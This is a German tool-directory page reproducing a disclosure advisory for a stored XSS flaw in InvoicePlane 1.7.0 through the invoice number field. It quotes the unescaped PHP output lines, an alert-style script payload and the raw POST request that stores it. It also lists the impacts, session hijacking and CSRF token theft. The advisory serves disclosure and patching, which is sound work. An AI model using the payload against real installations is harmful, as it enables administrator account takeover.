Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25595 — # Stored-XSS-Schwachstelle in InvoicePlane 1.7.0 über unsanitisiertes Rechnungsnummernfeld, mit Proof-of-Concept und Behebungsdetails. | Kitploit
Tools/GitHubGitHub/lagathos/cve-2026-25595
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & ForschungLernen & Bildung
GitHublagathos/cve-2026-25595

CVE-2026-25595

# Stored-XSS-Schwachstelle in InvoicePlane 1.7.0 über unsanitisiertes Rechnungsnummernfeld, mit Proof-of-Concept und Behebungsdetails.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25595 — Stored XSS über die Rechnungsnummer in InvoicePlane 1.7.0

Schwachstelle: Stored Cross-Site Scripting (XSS) über das Feld Rechnungsnummer

Produkt: InvoicePlane

Betroffene Version: 1.7.0 (und vermutlich frühere Versionen)

Schweregrad: Mittel

CVSS 3.1-Score: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten

Entdeckt von: Leonidas Agathos

Meldedatum: 2026-01-31


Beschreibung

Das Feld invoice_number im Rechnungsformular akzeptiert beliebige Eingaben ohne Bereinigung. Der Wert wird gespeichert und an mehreren Stellen unkodiert ausgegeben: im Seitentitel der Rechnungsansicht, im Eingabefeld der Rechnungsnummer und im Widget für aktuelle Rechnungen auf dem Dashboard. Das Payload wird ausgeführt, sobald ein Administrator die betroffene Rechnung ansieht oder das Dashboard besucht.

Betroffene Dateien:

  • application/modules/invoices/views/view.php:247
  • application/modules/invoices/views/view.php:494
  • application/modules/dashboard/views/index.php:233
  • root@kitploit:~
    // view.php - Zeile 247
    <?php echo trans('invoice') . ' ' . ($invoice->invoice_number ? '#' .
    $invoice->invoice_number : trans('id') . ': ' . $invoice->invoice_id); ?>
    
    // view.php - Zeile 494
    value="<?php echo $invoice->invoice_number; ?>"
    
    // dashboard/index.php - Zeile 233
    <?php echo anchor('invoices/view/' . $invoice->invoice_id, ($invoice->invoice_number
        ? $invoice->invoice_number : $invoice->invoice_id)); ?>
    

    Proof of Concept

    Schritt 1 — Payload in die Rechnungsnummer injizieren

    Erstellen oder bearbeiten Sie eine Rechnung unter /index.php/invoices/form/{id} und setzen Sie die Rechnungsnummer auf:

    root@kitploit:~
    <script>alert("XSS in Invoices")</script>
    

    Anfrage:

    root@kitploit:~
    POST /index.php/invoices/ajax/save HTTP/1.1
    Host: 172.25.0.12
    Content-Type: application/x-www-form-urlencoded
    
    invoice_number=<script>alert("XSS+in+Invoices")</script>&invoice_id=22&...
    

    Schritt 1 - Injizieren des XSS-Payloads in das Feld Rechnungsnummer über Burp Suite

    Schritt 2 — XSS auslösen

    Navigieren Sie zu /index.php/invoices/view/{id} oder /index.php/dashboard. Das Payload wird beim Laden der Seite ausgeführt.

    Schritt 2 - XSS wird beim Anzeigen des Rechnungsstatus ausgeführt


    Auswirkungen

    Das Payload wird im Browser jedes Administrators ausgeführt, der die betroffene Rechnung ansieht oder das Dashboard besucht. Dies ermöglicht Session-Hijacking (falls Cookies nicht HttpOnly sind), Diebstahl von CSRF-Tokens sowie Aktionen, die unter der Identität des Opfers ausgeführt werden.


    Zeitplan

    DatumEreignis
    2026-01-30Schwachstelle entdeckt
    2026-01-31Proof of Concept entwickelt
    2026-01-31Hersteller benachrichtigt
    2026-02-04Bestätigung durch den Hersteller
    2026-02-04Patch veröffentlicht
    2026-02-05Öffentliche Offenlegung

    Referenzen

    • CWE-79
    • OWASP: Cross-Site Scripting (XSS)
    • CVE-2026-25595

    Haftungsausschluss

    Diese Schwachstelle wurde im Rahmen unabhängiger Sicherheitsforschung entdeckt. Alle Informationen werden ausschließlich zu Bildungs-, Forschungs- und Verteidigungszwecken bereitgestellt, um dem Hersteller und der Sicherheitsgemeinschaft beim Verständnis und der Behebung des Problems zu helfen. Jegliche böswillige Nutzung dieser Informationen ist strengstens untersagt.

    Tool herunterladen